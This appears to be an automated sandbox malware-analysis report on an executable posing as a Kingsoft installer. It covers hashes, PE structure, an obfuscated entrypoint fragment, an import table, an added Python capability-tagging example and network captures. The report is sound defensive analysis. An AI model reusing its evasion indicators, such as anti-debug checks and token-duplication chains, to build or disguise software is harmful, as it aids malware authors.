• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: FileSetup-v17.04.41.exe
File size: 4592400
MD5: b7234e4a9aaaacefa890535f8117c8fc
SHA1: 24c4321111ff004105c14e29662682f16900de29
SHA256: a8fefe8e1f92a30d1cdd4e2e2afaacf08a02c8961f496ee16e89062417ec5f28
SHA512: 8590be6433943bec0867a18247e25d9821d39db1d06c6957d3895558eb5568dddff0b97acda222f0a16701c50de43d8ad667d6717add6900ec941e71ca28e513
SSDEEP: 98304:4u181qMJuVwd7Qld5ElgJQaQsPRT2KJLNx6DfgteKbeOJ:n294g7QxElWQaQyRTXy4vJ
File Content Preview: MZ......................@..................................................L.!This program cannot be run in DOS mode....$.......P,...M.^.M.^.M.^...^.M.^3..^5M.^3..^OM.^.B.^.M.^.B.^.M.^.M.^3L.^.M.^.M.^3..^OO.^3..^/M.^3..^.M.^3..^.M.^Rich.M.^...............

File Icon

Icon Hash: f0dcb6a9b792cc78

Static PE Info

General

Entrypoint: 0x494dd9
Entrypoint Section: .text
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp: 0x5603E382 [Thu Sep 24 11:50:26 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: c2a155c9804444dcd203f52770b81b7a

Authenticode Signature

Signature Valid:
Signature Issuer:
Signature Validation Error:
Error Number:
Not Before, Not After
  Subject Chain
    Version:
    Thumbprint MD5:
    Thumbprint SHA-1:
    Thumbprint SHA-256:
    Serial:

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub ebp, 18h
mov dword ptr [ebp-14h], 00494DD9h
push ebx
mov ebx, 0000002Fh
sub ebx, 00000000h
add ebx, dword ptr [ebp-14h]
push ebx
ret
mov ebx, dword ptr [edx]
mov ecx, edi
inc esi
call eax
mov edx, edi
mov ebp, edi
mov ebx, esi
call edx
mov ecx, dword ptr [esi]
pop ebx
push 00000004h
push ebx
mov ebx, 00000050h
sub ebx, 00000000h
add ebx, dword ptr [ebp-14h]
push ebx
ret
mov edx, esi
mov eax, esp
mov edx, dword ptr [ebx]
mov edi, ebp
mov esi, ebp
call edi
pop esi
pop ebx
mov eax, 0049515Bh
push ebx
mov ebx, 00000075h
sub ebx, 00000000h
add ebx, dword ptr [ebp-14h]
push ebx
ret
jmp eax
mov esp, edi
push esi
inc dword ptr [edx]
call edx
push ebp
mov esi, esp
call esi
pop ebx
push eax
push ebx
mov ebx, 00000093h
sub ebx, 00000000h
add ebx, dword ptr [ebp-14h]
push ebx
ret
dec edx
mov ebx, dword ptr [eax]
test eax, eax
call ecx
mov edx, ebp
mov ecx, eax
pop ebx
push 000013C5h
push ebx
mov ebx, 000000BBh
sub ebx, 00000000h
add ebx, dword ptr [ebp-14h]
push ebx
ret
mov edi, esi
mov ebp, esi
mov edi, ebx
pop ecx
mov esp, esi
mov edx, edi
mov ebp, eax
mov edi, esi
mov edx, dword ptr [eax]
pop ebx
push 0049598Fh
push ebx
mov ebx, 000000E0h

Rich Headers

Programming Language:
• [RES] VS2005 build 50727
• [ C ] VS2005 build 50727
• [LNK] VS2005 build 50727
• [C++] VS2005 build 50727
• [ASM] VS2005 build 50727

Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x103800         0x104         .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x112000         0x18dd4       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x126000         0x2310        .rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG           0xc6420          0x1c          .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0xfdd00          0x40          .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0xc6000          0x37c         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x1036d4         0x40          .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
.text   0x1000           0xc4afc       0xc5000   False     0.546581287674   data       6.76152862192  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata  0xc6000          0x3ebee       0x3f000   False     0.385079520089   data       5.53283110669  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0x105000         0xc944        0x8000    False     0.456268310547   data       4.86264952816  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc   0x112000         0x18dd4       0x19000   False     0.336767578125   data       5.46879328933  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name           RVA       Size     Language  Country        Type
RT_ICON        0x1121f0  0x10828  Chinese   China          dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
RT_ICON        0x122a18  0x4228   Chinese   China          dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 65279, next used block 4286513152
RT_ICON        0x126c40  0x25a8   Chinese   China          data
RT_ICON        0x1291e8  0x10a8   Chinese   China          data
RT_ICON        0x12a290  0x468    Chinese   China          GLS_BINARY_LSB_FIRST
RT_GROUP_ICON  0x12a6f8  0x4c     Chinese   China          data
RT_VERSION     0x12a744  0x368    Chinese   China          data
RT_MANIFEST    0x12aaac  0x325    English   United States  ASCII text, with very long lines, with CRLF line terminators

                                                                                                                                              Imports

                                                                                                                                              DLLImport
KERNEL32.dll: WriteFile, SetEndOfFile, GetTickCount, GetWindowsDirectoryW, FindClose, GetProcAddress, GetSystemDirectoryW, GetVersionExW, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, OpenProcess, LoadLibraryW, LocalAlloc, LocalFree, GetCurrentProcess, GetLocalTime, GetSystemInfo, InterlockedCompareExchange, FileTimeToSystemTime, FileTimeToLocalFileTime, GetUserDefaultLangID, DeviceIoControl, CreateFileA, LoadLibraryA, OpenMutexW, CreateDirectoryW, OpenSemaphoreW, GetCurrentProcessId, ProcessIdToSessionId, ExpandEnvironmentStringsW, Sleep, CreateProcessW, GetSystemTime, SetUnhandledExceptionFilter, CreateThread, SetEvent, GetLogicalDriveStringsW, QueryDosDeviceW, lstrcpyW, lstrcatW, GetModuleHandleA, GetVersion, GetFileType, GetStdHandle, QueryPerformanceCounter, GlobalMemoryStatus, FlushConsoleInputBuffer, GetCurrentDirectoryA, GetFullPathNameA, FindFirstFileA, GetDriveTypeA, ExpandEnvironmentStringsA, FormatMessageA, GetSystemDirectoryA, SleepEx, SetEnvironmentVariableA, CompareStringW, GetFileAttributesW, CreateFileW, ReadFile, DeleteFileW, SetFilePointer, lstrlenA, WideCharToMultiByte, TerminateThread, WaitForSingleObject, LeaveCriticalSection, MultiByteToWideChar, InterlockedDecrement, InterlockedIncrement, DeleteCriticalSection, lstrcmpiW, GetCurrentThreadId, FindResourceExW, InitializeCriticalSection, UnmapViewOfFile, LockResource, CloseHandle, FreeLibrary, LoadLibraryExW, MapViewOfFileEx, EnterCriticalSection, GetModuleFileNameW, FindResourceW, CreateFileMappingW, LoadResource, GetModuleHandleW, SizeofResource, GetLastError, lstrlenW, RaiseException, OpenEventW, CompareStringA, WriteConsoleW, GetConsoleOutputCP, WriteConsoleA, GetLocaleInfoW, GetStringTypeW, GetStringTypeA, IsValidLocale, EnumSystemLocalesA, GetUserDefaultLCID, SetStdHandle, FlushFileBuffers, GetCommandLineW, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetEnvironmentStrings, FreeEnvironmentStringsA, GetConsoleCP, GetTimeZoneInformation, GetStartupInfoA, SetHandleCount, IsValidCodePage, GetOEMCP, SetLastError, TlsFree, TlsSetValue, TlsAlloc, TlsGetValue, GetModuleFileNameA, HeapCreate, VirtualAlloc, VirtualFree, GetCPInfo, LCMapStringW, LCMapStringA, RtlUnwind, GetConsoleMode, SetConsoleMode, ReadConsoleInputA, SetConsoleCtrlHandler, GetStartupInfoW, ExitProcess, InterlockedExchange, GetVersionExA, GetACP, GetLocaleInfoA, GetThreadLocale, HeapDestroy, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, GetProcessHeap, ExitThread, TerminateProcess, UnhandledExceptionFilter, IsDebuggerPresent, GetSystemTimeAsFileTime, VirtualQuery
USER32.dll: CharNextW, DestroyWindow, UnregisterClassA, GetUserObjectInformationW, GetProcessWindowStation, MessageBoxA
ADVAPI32.dll: RegisterEventSourceA, ReportEventA, DeregisterEventSource, CreateProcessAsUserW, SetTokenInformation, DuplicateTokenEx, FreeSid, EqualSid, AllocateAndInitializeSid, GetTokenInformation, OpenProcessToken, RegOpenKeyW, RegQueryValueExW, RegEnumKeyExW, RegQueryInfoKeyW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegSetValueExW, RegCreateKeyExW, RegOpenKeyExW
SHELL32.dll: SHGetSpecialFolderPathW
ole32.dll: CoUninitialize, CoSetProxyBlanket, CoCreateInstance, CoTaskMemAlloc, CoTaskMemRealloc, CoTaskMemFree, CoInitializeEx
OLEAUT32.dll: VarUI4FromStr, SysFreeString, SysAllocString, VariantInit, VariantClear, SysStringLen
SHLWAPI.dll: PathRemoveFileSpecW, StrToIntW, PathFindFileNameW, PathFindExtensionW, PathFileExistsW, PathAddBackslashW
VERSION.dll: VerQueryValueW, GetFileVersionInfoSizeW, GetFileVersionInfoW
WTSAPI32.dll: WTSFreeMemory, WTSEnumerateSessionsW
iphlpapi.dll: IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
RPCRT4.dll: UuidCreate
PSAPI.DLL: GetProcessImageFileNameW, GetModuleFileNameExW
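A sandbox derives part of its capability signatures from an import table like the one above: a debugger check from IsDebuggerPresent, process enumeration from the Toolhelp32 trio, launching a process as another user from the token APIs plus CreateProcessAsUserW, ICMP echo from iphlpapi. The following is an added example, not code from the report or from Joe Sandbox, that tags those capabilities from the imports transcribed above. The rule set and tag names are this example's own assumption; it matches whole API chains rather than single names, and it also flags the caveat every analyst needs here: LoadLibrary plus GetProcAddress means the static table is only a lower bound on what the binary can call.

```python
"""Added example, not part of the Joe Sandbox report above: tag the coarse
capabilities that an import table like the one printed above implies.

The import list is transcribed from the report (trimmed to what the rules
look at). The rule set is this example's own assumption, not Joe Sandbox's
signature logic; it shows why chains of APIs, not single names, are matched.
"""
from typing import Dict, List, Set

# DLL -> imported function names, transcribed from the report's import table.
SAMPLE_IMPORTS: Dict[str, List[str]] = {
    "KERNEL32.dll": [
        "CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW",
        "OpenProcess", "LoadLibraryW", "LoadLibraryA", "GetProcAddress",
        "IsDebuggerPresent", "GetLogicalDriveStringsW", "GetDriveTypeA",
        "DeviceIoControl", "ProcessIdToSessionId", "CreateProcessW", "Sleep",
    ],
    "ADVAPI32.dll": [
        "OpenProcessToken", "GetTokenInformation", "DuplicateTokenEx",
        "SetTokenInformation", "CreateProcessAsUserW",
        "RegCreateKeyExW", "RegSetValueExW", "RegDeleteKeyW",
    ],
    "WTSAPI32.dll": ["WTSEnumerateSessionsW", "WTSFreeMemory"],
    "iphlpapi.dll": ["IcmpCreateFile", "IcmpSendEcho", "IcmpCloseHandle"],
    "PSAPI.DLL": ["GetProcessImageFileNameW", "GetModuleFileNameExW"],
}

# tag -> APIs that must ALL be imported (assumed rule set). Matching the
# whole chain keeps noise down: OpenProcessToken alone appears in nearly
# every installer, but OpenProcessToken + DuplicateTokenEx +
# CreateProcessAsUserW is the sequence needed to start a process under
# another user's token.
RULES: Dict[str, Set[str]] = {
    "anti-debug": {"IsDebuggerPresent"},
    "process-enumeration": {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"},
    "launch-as-other-user": {"OpenProcessToken", "DuplicateTokenEx", "CreateProcessAsUserW"},
    "session-enumeration": {"WTSEnumerateSessionsW"},
    "icmp-ping": {"IcmpCreateFile", "IcmpSendEcho"},
    "drive-enumeration": {"GetLogicalDriveStringsW", "GetDriveTypeA"},
    "driver-communication": {"DeviceIoControl"},
    "registry-write": {"RegCreateKeyExW", "RegSetValueExW"},
    "dynamic-api-resolution": {"LoadLibraryW", "GetProcAddress"},
}


def imported_apis(imports: Dict[str, List[str]]) -> Set[str]:
    """Flatten the table to a case-insensitive set of API names."""
    return {name.lower() for names in imports.values() for name in names}


def tag_capabilities(imports: Dict[str, List[str]]) -> List[str]:
    """Return the sorted tags whose full API chain is present."""
    present = imported_apis(imports)
    return sorted(tag for tag, chain in RULES.items()
                  if all(api.lower() in present for api in chain))


def static_imports_are_complete(imports: Dict[str, List[str]]) -> bool:
    """False when the binary can resolve APIs at run time. In that case the
    import table is a lower bound on capability: an API that is absent here
    may still be reached through GetProcAddress, so 'not imported' never
    means 'not used'."""
    present = imported_apis(imports)
    loads_libraries = bool({"loadlibrarya", "loadlibraryw", "loadlibraryexw"} & present)
    return not (loads_libraries and "getprocaddress" in present)


if __name__ == "__main__":
    print("tags:", ", ".join(tag_capabilities(SAMPLE_IMPORTS)))
    print("static import table complete:", static_imports_are_complete(SAMPLE_IMPORTS))
```

Run on the transcribed table this reports every tag in the rule set and `static_imports_are_complete` returns False, which is the right reading of this sample: what is listed is real, but the list is not exhaustive.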

Version Infos

Description       Data
LegalCopyright    Copyright (C) 1998-2015 Kingsoft Corporation
InternalName      KInstallTool
FileVersion       2015,09,24,14384
CompanyName       Kingsoft Corporation
ProductName       Kingsoft Internet Security
ProductVersion    9,3,252534,14384
FileDescription   Kingsoft Install Tool
OriginalFilename  KInstallTool.exe
Translation       0x0000 0x04b0

Possible Origin

Language of compilation system  Country where language is spoken
Chinese                         China
English                         United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp                            Source Port  Dest Port  Source IP     Dest IP
Jan 29, 2021 10:57:39.227457047 CET  49725        80         192.168.2.3   104.21.23.16
Jan 29, 2021 10:57:39.273248911 CET  80           49725      104.21.23.16  192.168.2.3
Jan 29, 2021 10:57:39.273334980 CET  49725        80         192.168.2.3   104.21.23.16
Jan 29, 2021 10:57:39.274213076 CET  49725        80         192.168.2.3   104.21.23.16
Jan 29, 2021 10:57:39.274293900 CET  49725        80         192.168.2.3   104.21.23.16
Jan 29, 2021 10:57:39.320132017 CET  80           49725      104.21.23.16  192.168.2.3
Jan 29, 2021 10:57:39.320157051 CET  80           49725      104.21.23.16  192.168.2.3
Jan 29, 2021 10:57:39.961137056 CET  80           49725      104.21.23.16  192.168.2.3
Jan 29, 2021 10:57:39.976404905 CET  49725        80         192.168.2.3   104.21.23.16
Jan 29, 2021 10:57:39.976480961 CET  49725        80         192.168.2.3   104.21.23.16
Jan 29, 2021 10:57:40.022109985 CET  80           49725      104.21.23.16  192.168.2.3
Jan 29, 2021 10:57:40.022135019 CET  80           49725      104.21.23.16  192.168.2.3
Jan 29, 2021 10:57:41.399874926 CET  80           49725      104.21.23.16  192.168.2.3
Jan 29, 2021 10:57:41.454600096 CET  49725        80         192.168.2.3   104.21.23.16
Jan 29, 2021 10:57:41.489664078 CET  49725        80         192.168.2.3   104.21.23.16
Jan 29, 2021 10:57:41.489733934 CET  49725        80         192.168.2.3   104.21.23.16
Jan 29, 2021 10:57:41.535548925 CET  80           49725      104.21.23.16  192.168.2.3
Jan 29, 2021 10:57:41.535571098 CET  80           49725      104.21.23.16  192.168.2.3
Jan 29, 2021 10:57:44.276484966 CET  80           49725      104.21.23.16  192.168.2.3
Jan 29, 2021 10:57:44.329843998 CET  49725        80         192.168.2.3   104.21.23.16
Jan 29, 2021 10:57:46.477119923 CET  49725        80         192.168.2.3   104.21.23.16
Jan 29, 2021 10:57:46.477178097 CET  49725        80         192.168.2.3   104.21.23.16
Jan 29, 2021 10:57:46.524256945 CET  80           49725      104.21.23.16  192.168.2.3
Jan 29, 2021 10:57:46.524293900 CET  80           49725      104.21.23.16  192.168.2.3
Jan 29, 2021 10:57:50.713327885 CET  80           49725      104.21.23.16  192.168.2.3
Jan 29, 2021 10:57:50.814753056 CET  49725        80         192.168.2.3   104.21.23.16
Jan 29, 2021 10:57:53.938409090 CET  49730        80         192.168.2.3   104.21.23.16
Jan 29, 2021 10:57:53.984313011 CET  80           49730      104.21.23.16  192.168.2.3
Jan 29, 2021 10:57:53.984431982 CET  49730        80         192.168.2.3   104.21.23.16
Jan 29, 2021 10:57:53.984832048 CET  49730        80         192.168.2.3   104.21.23.16
Jan 29, 2021 10:57:53.984879017 CET  49730        80         192.168.2.3   104.21.23.16
Jan 29, 2021 10:57:54.030569077 CET  80           49730      104.21.23.16  192.168.2.3
Jan 29, 2021 10:57:54.030608892 CET  80           49730      104.21.23.16  192.168.2.3
Jan 29, 2021 10:57:54.944314003 CET  49731        80         192.168.2.3   104.21.23.16
Jan 29, 2021 10:57:54.990245104 CET  80           49731      104.21.23.16  192.168.2.3
Jan 29, 2021 10:57:54.990468979 CET  49731        80         192.168.2.3   104.21.23.16
Jan 29, 2021 10:57:54.991064072 CET  49731        80         192.168.2.3   104.21.23.16
Jan 29, 2021 10:57:54.991079092 CET  49731        80         192.168.2.3   104.21.23.16
Jan 29, 2021 10:57:55.036803007 CET  80           49731      104.21.23.16  192.168.2.3
Jan 29, 2021 10:57:55.036842108 CET  80           49731      104.21.23.16  192.168.2.3
Jan 29, 2021 10:57:56.412005901 CET  49725        80         192.168.2.3   104.21.23.16
Jan 29, 2021 10:57:58.149625063 CET  80           49730      104.21.23.16  192.168.2.3
Jan 29, 2021 10:57:58.268517971 CET  49730        80         192.168.2.3   104.21.23.16
Jan 29, 2021 10:58:01.071065903 CET  80           49731      104.21.23.16  192.168.2.3
Jan 29, 2021 10:58:01.268774033 CET  49731        80         192.168.2.3   104.21.23.16
Jan 29, 2021 10:58:02.347929001 CET  49731        80         192.168.2.3   104.21.23.16
Jan 29, 2021 10:58:02.348011971 CET  49731        80         192.168.2.3   104.21.23.16
Jan 29, 2021 10:58:02.393821001 CET  80           49731      104.21.23.16  192.168.2.3
Jan 29, 2021 10:58:02.393855095 CET  80           49731      104.21.23.16  192.168.2.3
Jan 29, 2021 10:58:06.584638119 CET  80           49731      104.21.23.16  192.168.2.3
Jan 29, 2021 10:58:06.701675892 CET  49731        80         192.168.2.3   104.21.23.16
Jan 29, 2021 10:58:07.034818888 CET  49730        80         192.168.2.3   104.21.23.16
Jan 29, 2021 10:58:07.034873962 CET  49730        80         192.168.2.3   104.21.23.16
Jan 29, 2021 10:58:07.081028938 CET  80           49730      104.21.23.16  192.168.2.3
Jan 29, 2021 10:58:07.081056118 CET  80           49730      104.21.23.16  192.168.2.3
Jan 29, 2021 10:58:08.430646896 CET  80           49730      104.21.23.16  192.168.2.3
Jan 29, 2021 10:58:08.430690050 CET  80           49730      104.21.23.16  192.168.2.3
Jan 29, 2021 10:58:08.430813074 CET  49730        80         192.168.2.3   104.21.23.16
Jan 29, 2021 10:58:08.452989101 CET  49730        80         192.168.2.3   104.21.23.16
Jan 29, 2021 10:58:08.453020096 CET  49730        80         192.168.2.3   104.21.23.16
Jan 29, 2021 10:58:08.498878002 CET  80           49730      104.21.23.16  192.168.2.3
Jan 29, 2021 10:58:08.498900890 CET  80           49730      104.21.23.16  192.168.2.3
Jan 29, 2021 10:58:09.826873064 CET  49731        80         192.168.2.3   104.21.23.16
Jan 29, 2021 10:58:14.426819086 CET  80           49730      104.21.23.16  192.168.2.3
Jan 29, 2021 10:58:14.466605902 CET  49730        80         192.168.2.3   104.21.23.16
Jan 29, 2021 10:58:14.787164927 CET  49730        80         192.168.2.3   104.21.23.16
Jan 29, 2021 10:58:14.787204027 CET  49730        80         192.168.2.3   104.21.23.16
Jan 29, 2021 10:58:14.834538937 CET  80           49730      104.21.23.16  192.168.2.3
Jan 29, 2021 10:58:14.834566116 CET  80           49730      104.21.23.16  192.168.2.3
Jan 29, 2021 10:58:14.834579945 CET  80           49730      104.21.23.16  192.168.2.3
Jan 29, 2021 10:58:16.177582979 CET  80           49730      104.21.23.16  192.168.2.3
Jan 29, 2021 10:58:16.211626053 CET  49730        80         192.168.2.3   104.21.23.16
Jan 29, 2021 10:58:16.211760998 CET  49730        80         192.168.2.3   104.21.23.16
Jan 29, 2021 10:58:16.258160114 CET  80           49730      104.21.23.16  192.168.2.3
Jan 29, 2021 10:58:16.258178949 CET  80           49730      104.21.23.16  192.168.2.3
Jan 29, 2021 10:58:20.519503117 CET  80           49730      104.21.23.16  192.168.2.3
Jan 29, 2021 10:58:20.522950888 CET  49730        80         192.168.2.3   104.21.23.16
Jan 29, 2021 10:58:20.568969965 CET  80           49730      104.21.23.16  192.168.2.3
Jan 29, 2021 10:58:21.874977112 CET  80           49730      104.21.23.16  192.168.2.3
Jan 29, 2021 10:58:21.875001907 CET  80           49730      104.21.23.16  192.168.2.3
Jan 29, 2021 10:58:21.875085115 CET  49730        80         192.168.2.3   104.21.23.16
Jan 29, 2021 10:58:38.902834892 CET  49730        80         192.168.2.3   104.21.23.16
Jan 29, 2021 10:58:38.903032064 CET  49730        80         192.168.2.3   104.21.23.16
Jan 29, 2021 10:58:38.948702097 CET  80           49730      104.21.23.16  192.168.2.3
Jan 29, 2021 10:58:38.948728085 CET  80           49730      104.21.23.16  192.168.2.3
Jan 29, 2021 10:58:43.088757992 CET  80           49730      104.21.23.16  192.168.2.3
Jan 29, 2021 10:58:43.131666899 CET  49730        80         192.168.2.3   104.21.23.16
Jan 29, 2021 10:58:49.145030022 CET  49746        80         192.168.2.3   104.21.23.16
Jan 29, 2021 10:58:49.191629887 CET  80           49746      104.21.23.16  192.168.2.3
Jan 29, 2021 10:58:49.191756964 CET  49746        80         192.168.2.3   104.21.23.16
Jan 29, 2021 10:58:49.195518970 CET  49746        80         192.168.2.3   104.21.23.16
Jan 29, 2021 10:58:49.241374016 CET  80           49746      104.21.23.16  192.168.2.3
Jan 29, 2021 10:58:50.595266104 CET  80           49746      104.21.23.16  192.168.2.3
Jan 29, 2021 10:58:50.595309019 CET  80           49746      104.21.23.16  192.168.2.3
Jan 29, 2021 10:58:50.595454931 CET  49746        80         192.168.2.3   104.21.23.16
Jan 29, 2021 10:58:51.336580038 CET  49746        80         192.168.2.3   104.21.23.16
Jan 29, 2021 10:58:51.382827997 CET  80           49746      104.21.23.16  192.168.2.3
Jan 29, 2021 10:58:51.383044958 CET  49746        80         192.168.2.3   104.21.23.16
Jan 29, 2021 10:58:54.363826990 CET  49730        80         192.168.2.3   104.21.23.16

UDP Packets

Timestamp                            Source Port  Dest Port  Source IP     Dest IP
Jan 29, 2021 10:57:28.339449883 CET  63492        53         192.168.2.3   8.8.8.8
Jan 29, 2021 10:57:28.390253067 CET  53           63492      8.8.8.8       192.168.2.3
Jan 29, 2021 10:57:29.558053017 CET  60831        53         192.168.2.3   8.8.8.8
Jan 29, 2021 10:57:29.614608049 CET  53           60831      8.8.8.8       192.168.2.3
Jan 29, 2021 10:57:30.708121061 CET  60100        53         192.168.2.3   8.8.8.8
Jan 29, 2021 10:57:30.759028912 CET  53           60100      8.8.8.8       192.168.2.3
Jan 29, 2021 10:57:31.902215004 CET  53195        53         192.168.2.3   8.8.8.8
Jan 29, 2021 10:57:31.950103998 CET  53           53195      8.8.8.8       192.168.2.3
Jan 29, 2021 10:57:33.576231956 CET  50141        53         192.168.2.3   8.8.8.8
Jan 29, 2021 10:57:33.627038002 CET  53           50141      8.8.8.8       192.168.2.3
Jan 29, 2021 10:57:35.344373941 CET  53023        53         192.168.2.3   8.8.8.8
Jan 29, 2021 10:57:35.392333031 CET  53           53023      8.8.8.8       192.168.2.3
Jan 29, 2021 10:57:36.503122091 CET  49563        53         192.168.2.3   8.8.8.8
Jan 29, 2021 10:57:36.550887108 CET  53           49563      8.8.8.8       192.168.2.3
Jan 29, 2021 10:57:37.649226904 CET  51352        53         192.168.2.3   8.8.8.8
Jan 29, 2021 10:57:37.697004080 CET  53           51352      8.8.8.8       192.168.2.3
Jan 29, 2021 10:57:38.863976955 CET  59349        53         192.168.2.3   8.8.8.8
Jan 29, 2021 10:57:38.914632082 CET  53           59349      8.8.8.8       192.168.2.3
Jan 29, 2021 10:57:39.154855013 CET  57084        53         192.168.2.3   8.8.8.8
Jan 29, 2021 10:57:39.214333057 CET  53           57084      8.8.8.8       192.168.2.3
Jan 29, 2021 10:57:40.797672987 CET  58823        53         192.168.2.3   8.8.8.8
Jan 29, 2021 10:57:40.848685980 CET  53           58823      8.8.8.8       192.168.2.3
Jan 29, 2021 10:57:42.325683117 CET  57568        53         192.168.2.3   8.8.8.8
Jan 29, 2021 10:57:42.373552084 CET  53           57568      8.8.8.8       192.168.2.3
Jan 29, 2021 10:57:43.513323069 CET  50540        53         192.168.2.3   8.8.8.8
Jan 29, 2021 10:57:43.573118925 CET  53           50540      8.8.8.8       192.168.2.3
Jan 29, 2021 10:57:53.872057915 CET  54366        53         192.168.2.3   8.8.8.8
Jan 29, 2021 10:57:53.928330898 CET  53           54366      8.8.8.8       192.168.2.3
Jan 29, 2021 10:57:54.856245041 CET  53034        53         192.168.2.3   8.8.8.8
Jan 29, 2021 10:57:54.918409109 CET  53           53034      8.8.8.8       192.168.2.3
Jan 29, 2021 10:57:56.574156046 CET  57762        53         192.168.2.3   8.8.8.8
Jan 29, 2021 10:57:56.632173061 CET  53           57762      8.8.8.8       192.168.2.3
Jan 29, 2021 10:58:07.886915922 CET  55435        53         192.168.2.3   8.8.8.8
Jan 29, 2021 10:58:07.934978008 CET  53           55435      8.8.8.8       192.168.2.3
Jan 29, 2021 10:58:16.634157896 CET  50713        53         192.168.2.3   8.8.8.8
Jan 29, 2021 10:58:16.690663099 CET  53           50713      8.8.8.8       192.168.2.3
Jan 29, 2021 10:58:17.408256054 CET  56132        53         192.168.2.3   8.8.8.8
Jan 29, 2021 10:58:17.467639923 CET  53           56132      8.8.8.8       192.168.2.3
Jan 29, 2021 10:58:17.799479008 CET  58987        53         192.168.2.3   8.8.8.8
Jan 29, 2021 10:58:17.853208065 CET  53           58987      8.8.8.8       192.168.2.3
                                                                                                                                              Jan 29, 2021 10:58:18.302578926 CET5657953192.168.2.38.8.8.8
                                                                                                                                              Jan 29, 2021 10:58:18.350500107 CET53565798.8.8.8192.168.2.3
                                                                                                                                              Jan 29, 2021 10:58:30.349826097 CET6063353192.168.2.38.8.8.8
                                                                                                                                              Jan 29, 2021 10:58:30.410259008 CET53606338.8.8.8192.168.2.3
                                                                                                                                              Jan 29, 2021 10:58:39.352690935 CET6129253192.168.2.38.8.8.8
                                                                                                                                              Jan 29, 2021 10:58:39.435403109 CET53612928.8.8.8192.168.2.3
                                                                                                                                              Jan 29, 2021 10:58:49.066128969 CET6361953192.168.2.38.8.8.8
                                                                                                                                              Jan 29, 2021 10:58:49.123408079 CET53636198.8.8.8192.168.2.3
                                                                                                                                              Jan 29, 2021 10:58:58.339248896 CET6493853192.168.2.38.8.8.8
                                                                                                                                              Jan 29, 2021 10:58:58.387324095 CET53649388.8.8.8192.168.2.3
                                                                                                                                              Jan 29, 2021 10:58:58.785707951 CET6194653192.168.2.38.8.8.8
                                                                                                                                              Jan 29, 2021 10:58:58.844871044 CET53619468.8.8.8192.168.2.3
                                                                                                                                              Jan 29, 2021 10:59:21.013367891 CET6491053192.168.2.38.8.8.8
                                                                                                                                              Jan 29, 2021 10:59:21.064090014 CET53649108.8.8.8192.168.2.3
                                                                                                                                              Jan 29, 2021 11:00:13.656512022 CET5212353192.168.2.38.8.8.8
                                                                                                                                              Jan 29, 2021 11:00:13.707995892 CET53521238.8.8.8192.168.2.3
                                                                                                                                              Jan 29, 2021 11:00:14.237154961 CET5613053192.168.2.38.8.8.8
                                                                                                                                              Jan 29, 2021 11:00:14.288053036 CET53561308.8.8.8192.168.2.3
                                                                                                                                              Jan 29, 2021 11:00:15.067559004 CET5633853192.168.2.38.8.8.8
                                                                                                                                              Jan 29, 2021 11:00:15.132400036 CET53563388.8.8.8192.168.2.3
                                                                                                                                              Jan 29, 2021 11:00:15.510848045 CET5942053192.168.2.38.8.8.8
                                                                                                                                              Jan 29, 2021 11:00:15.567234039 CET53594208.8.8.8192.168.2.3
                                                                                                                                              Jan 29, 2021 11:00:15.980833054 CET5878453192.168.2.38.8.8.8
                                                                                                                                              Jan 29, 2021 11:00:16.037415028 CET53587848.8.8.8192.168.2.3
                                                                                                                                              Jan 29, 2021 11:00:16.480447054 CET6397853192.168.2.38.8.8.8
                                                                                                                                              Jan 29, 2021 11:00:16.537077904 CET53639788.8.8.8192.168.2.3
                                                                                                                                              Jan 29, 2021 11:00:16.975590944 CET6293853192.168.2.38.8.8.8
                                                                                                                                              Jan 29, 2021 11:00:17.034116983 CET53629388.8.8.8192.168.2.3
                                                                                                                                              Jan 29, 2021 11:00:17.576896906 CET5570853192.168.2.38.8.8.8
                                                                                                                                              Jan 29, 2021 11:00:17.636254072 CET53557088.8.8.8192.168.2.3
